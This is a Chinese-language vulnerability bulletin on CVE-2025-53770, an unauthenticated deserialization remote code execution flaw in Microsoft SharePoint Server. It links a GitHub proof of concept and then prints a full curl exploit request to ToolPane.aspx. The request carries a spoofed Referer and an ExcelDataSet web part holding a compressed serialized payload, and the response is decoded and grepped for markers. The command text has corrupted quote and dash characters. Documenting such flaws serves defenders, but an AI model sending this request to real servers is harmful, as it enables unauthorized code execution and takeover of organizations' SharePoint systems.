Microsoft SharePoint Server 反序列化远程代码执行漏洞

漏洞信息

漏洞名称： Microsoft SharePoint Server 反序列化远程代码执行漏洞

漏洞编号：

• CVE： CVE-2025-53770

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Microsoft SharePoint Server是一款广泛使用的企业级协作平台，支持文档管理、内容管理、社交网络等功能，广泛应用于企业、政府机构等组织中。该漏洞允许攻击者通过反序列化不受信任的数据实现未认证的远程代码执行，严重威胁到使用该产品的组织安全。

漏洞的技术根源在于Microsoft SharePoint Server在处理特定请求时，未能正确验证和过滤用户提供的数据，导致攻击者可以构造恶意的序列化数据，触发服务器端代码执行。这种类型的漏洞通常由于应用程序在处理对象序列化和反序列化时缺乏足够的安全检查而引起。

此漏洞的影响极为严重，攻击者无需任何认证即可利用此漏洞在服务器上执行任意代码，可能导致数据泄露、服务中断、甚至完全控制受影响的服务器。鉴于Microsoft已经意识到此漏洞正在被积极利用，所有使用Microsoft SharePoint Server的组织应立即应用相关的安全补丁或缓解措施，以防止潜在的攻击。

产品厂商： Microsoft

产品名称： Microsoft SharePoint Server

来源： https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

类型： CVE-2025:github search

仓库文件

• 469419245-fcbc84e9-ffc0-4264-bde8-f2a4b4b70095.png
• CVE-2025-53770-main (1).zip
• README.md

来源概述

CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

A critical vulnerability in Microsoft SharePoint Server allows unauthenticated remote code execution via deserialization of untrusted data. Microsoft is aware of active exploitation; apply CVE mitigations immediately. Severity: Critical.

commands

curl -sk -X POST ‘https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx‘
-H ‘Referer: /_layouts/SignOut.aspx’
-H ‘Content-Type: application/x-www-form-urlencoded’
–data-urlencode ‘MSOTlPn_Uri=https://reeaccated.com‘
–data-urlencode ‘MSOTlPn_DWP=
<%@ Register Tagprefix=”Scorecard” Namespace=”Microsoft.PerformancePoint.Scorecards” Assembly=”Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c” %>
<%@ Register Tagprefix=”asp” Namespace=”System.Web.UI” Assembly=”System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35” %>
<asp:UpdateProgress ID=”UpdateProgress1” DisplayAfter=”10” runat=”server” AssociatedUpdatePanelID=”upTest”>

<Scorecard:ExcelDataSet CompressedDataTable=”H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=” DataTable-CaseSensitive=”false” runat=”server”>

‘
| grep -oP ‘CompressedDataTable="\K[^&]+(?=")’
| base64 -d 2>/dev/null
| gzip -d 2>/dev/null
| tee /tmp/sharepoint_decoded_payload.txt
| grep -Ei ‘IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard’